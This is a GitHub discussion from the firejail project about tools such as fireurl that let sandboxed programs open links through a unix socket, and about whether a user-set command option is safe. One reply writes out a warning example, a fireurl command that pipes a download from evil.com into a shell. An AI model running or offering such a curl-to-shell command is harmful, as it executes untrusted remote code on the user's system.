### DISCUSSION TITLE
Is there a program that listens to URL requests on a unix socket and opens appropriate programs?

### DISCUSSION THREAD

**Discussion by amano-kenji** [netblue30/firejail#5688] [Q&A] [answered]
Having to copy and paste links is tiresome. I just want to click links and see an appropriate program open.

Is there a program that listens to URL requests on a unix socket and opens appropriate programs?

Or, should I write one?

Relates to:

* #6462

**Comment by kmk3** [comment, marked as answer]
@amano-kenji [on Feb 27](https://github.com/netblue30/firejail/discussions/5688#discussion-4900427):

> Having to copy and paste links is tiresome. I just want to click links and
> see an appropriate program open.
> 
> Is there a program that listens to URL requests on a unix socket and opens
> appropriate programs?

You're in luck, as there are at least two implementations of that; see the
following discussion and the linked discussions:

* #5582

**Reply by amano-kenji** [reply]
Is https://github.com/rusty-snake/fireurl it? What is another implementation?

**Reply by ghost** [reply]
> Is https://github.com/rusty-snake/fireurl it?

Yes that's the correct link for fireurl, which is written in rust.

> What is another implementation?

The second implementation can be found in https://github.com/netblue30/firejail/discussions/5582. Check the example code there for url-writer +  url-reader / fireurl + fireurld ( written as POSIX shell scripts).

Caveat: these are both working fine last I checked, but limited to URL-handling only. If you need something that supports more application handlers like irc(s), mailto, magnet, ... your best bet would be to write your own. You could ofcourse build on the above and add other mime-handlers. Or create your own custom xdg-open and adjust your firejail profiles accordingly.

**Reply by amano-kenji** [reply]
fireurl uses firefox only. I don't like that. It should be customizable.

**Comment by ghost** [comment]
> fireurl uses firefox only. I don't like that. It should be customizable.

Please bare in mind that this is at the discretion of the software's author (which happens to be a highly regarded collaborator to the Firejail project). People create/share these tools voluntarily, for free. So I'd say 'regular' procedures apply, meaning you can request enhancements or open PR's at the project's home page/issue tracker.

Try the second set of POSIX shell scripts for supporting a different web browser than Firefox. According to their code you can set the BROWSER environment variable.

Whichever way you go, just remember that for supporting additional firejailed web browsers you probably have to add overrides to the relevant profiles to allow access to the UNIX socket.

**Reply by rusty-snake** [reply]
> fireurl uses firefox only. I don't like that. It should be customizable.

You're right. However the focus during the initial development was the IPC over the socket. The open function is currently only a dummy to show that the message was received correctly.

- https://github.com/rusty-snake/fireurl/issues/2
- https://github.com/rusty-snake/fireurl/blob/3cf92cb0de2676aeb379c2c0381eacf2ee830b79/src/lib.rs#L20-L30

**Reply by amano-kenji** [reply]
Is fireurl a replacement for xdg-open or something that should be called by xdg-open?

**Reply by rusty-snake** [reply]
It's not a replacement for xdg-open.

Getting called by xdg-open is a possible/legitimate/reasonable usage.

**Reply by amano-kenji** [reply]
Then, it should be possible to specify the application to open a URL or a file path with, as a command line option to fireurl.

Otherwise, you have to do something like mime-type detection which can make fireurl a full-blown alternative to xdg-open.

**Reply by rusty-snake** [reply]
Did you read the links?

**Reply by rusty-snake** [reply]
Or did you mean something like

```bash
fireurl --command="/bin/sh -c 'curl %u | sh'" https://evil.com/payload
```

I hope I don't have to say with this is a bad idea.

**Reply by amano-kenji** [reply]
I didn't read link fully. Sorry.

Yes, I imagined something like
```
fireurl --command="qutebrowser" https://github.com
```
Since you control what goes in `--command`, I think it's safe?

**Reply by amano-kenji** [reply]
Anyway, having a mapping from URL protocols to programs can be cool. But, what about local file paths?

Are you sure you don't want to be an alternative to xdg-open?

**Reply by rusty-snake** [reply]
> Since you control what goes in --command, I think it's safe?

How is you?

It's not necessarily the user. It's every program that can use fireurl. And the original idea was that a sandboxed program calls fireurl to open links.

> But, what about local file paths?

There are two things.

1. local file paths via `file:`-uri
   - are covered with an uri-to-cmd config
2. and local file paths like `/home/me/Downloads/funny01.png`.
   - are more difficult
   - how do we handle program association?  
     - via file extension?
       - what if file does not has one
     - sniff the content with something like `file` to get the mime type
       - but the files might be untrusted
     - just let an external program (`xdg-open`, file-manager, ...) handle it
       - but the might be doing the sniffing w/o any sandbox
   - how can we have restrictions on the uri when anything is a legitimate local paths?

> Are you sure you don't want to be an alternative to xdg-open?

Not in the sense I understand "to be an alternative to xdg-open". I the sense I think you mean "to be an alternative to xdg-open" i.e. an "xdg-open on steroids" can be an goal in the long run.

**Reply by amano-kenji** [reply]
I think fireurl at least should handle multiple URL protocols.

**Comment by rusty-snake** [comment]
fireurl 0.2.0: You can now set `FIREURL_BROWSER=brave-browser` (or whatever you want).
